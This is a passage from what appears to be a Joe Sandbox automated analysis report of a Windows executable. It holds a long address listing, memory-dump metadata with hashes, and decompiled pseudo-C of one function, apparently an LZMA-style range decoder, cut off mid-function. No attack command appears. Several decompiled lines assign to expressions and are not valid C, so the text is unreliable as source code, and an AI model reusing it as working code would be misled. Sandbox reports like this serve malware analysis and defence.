                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040744d
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407120

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                              • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                              • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                              • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
